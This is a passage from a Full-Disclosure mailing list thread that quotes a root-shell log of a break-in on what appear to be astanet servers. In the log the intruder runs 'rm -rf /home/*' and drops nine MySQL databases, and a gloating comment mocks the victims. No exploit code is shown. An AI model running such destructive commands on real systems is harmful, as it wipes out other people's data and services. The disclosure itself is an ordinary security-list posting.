>> rm: cannot remove directory `/var/log//proftpd': Directory not empty
>> sh-3.2# rm -rf /home/*
>> sh-3.2# mysql
>> Welcome to the MySQL monitor.  Commands end with ; or \g.
>> Your MySQL connection id is 407156
>> Server version: 5.0.45-community-log MySQL Community Edition (GPL)
>>
>> Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
>>
>> mysql> show databases;
>> +-----------------------+
>> | Database              |
>> +-----------------------+
>> | information_schema    |
>> | astanet_ads           |
>> | astanet_mailing_lists |
>> | astanet_mediawiki     |
>> | astanet_membersystem  |
>> | com_contrexx          |
>> | com_contrexx2         |
>> | com_contrexx2_live    |
>> | da_roundcube          |
>> | dolphin               |
>> | ideapool              |
>> | mysql                 |
>> | test                  |
>> | yourmaster            |
>> +-----------------------+
>> 14 rows in set (0.03 sec)
>>
>> mysql> drop database astanet_membersystem;
>> droQuery OK, 46 rows affected (0.81 sec)
>>
>> mysql> drop database com_contrexx;
>> Query OK, 211 rows affected (2.72 sec)
>>
>> mysql> drop database com_contrexx2;
>> Query OK, 237 rows affected (2.23 sec)
>>
>> mysql> drop database com_contrexx2_live;
>> Query OK, 227 rows affected (7.63 sec)
>>
>> mysql> drop database ideapool;
>> Query OK, 69 rows affected (0.19 sec)
>>
>> mysql> drop database yourmaster;
>> Query OK, 158 rows affected (0.55 sec)
>>
>> mysql> drop database astanet_ads;
>> Query OK, 9 rows affected (0.11 sec)
>>
>> mysql> drop database astanet_mailing_lists;
>> Query OK, 24 rows affected (1.47 sec)
>>
>> mysql> drop database astanet_mediawiki;
>> Query OK, 31 rows affected (0.51 sec)
>>
>> mysql> show databases;
>> +--------------------+
>> | Database           |
>> +--------------------+
>> | information_schema |
>> | da_roundcube       |
>> | dolphin            |
>> | mysql              |
>> | test               |
>> +--------------------+
>> 5 rows in set (0.00 sec)
>>
>>
>> What a journey! We're not sure exactly why the "Terminator" had any
>> influence on
>> their naming (conventions) but we're sure Arnold himself wouldn't
>> be in the
>> wrong to say this pack of morons *wont be back*.
>>
>> --
>> Explore Africa with a luxurious safari vacation. Click now!
>>
>> http://tagline.hushmail.com/fc/BLSrjkqibJ4YFlT0yWUQGlcnCi5pjZKvouw2zmCrKTyocKlZVTVGpO7c11G/
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
http://www.jewelerslounge.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/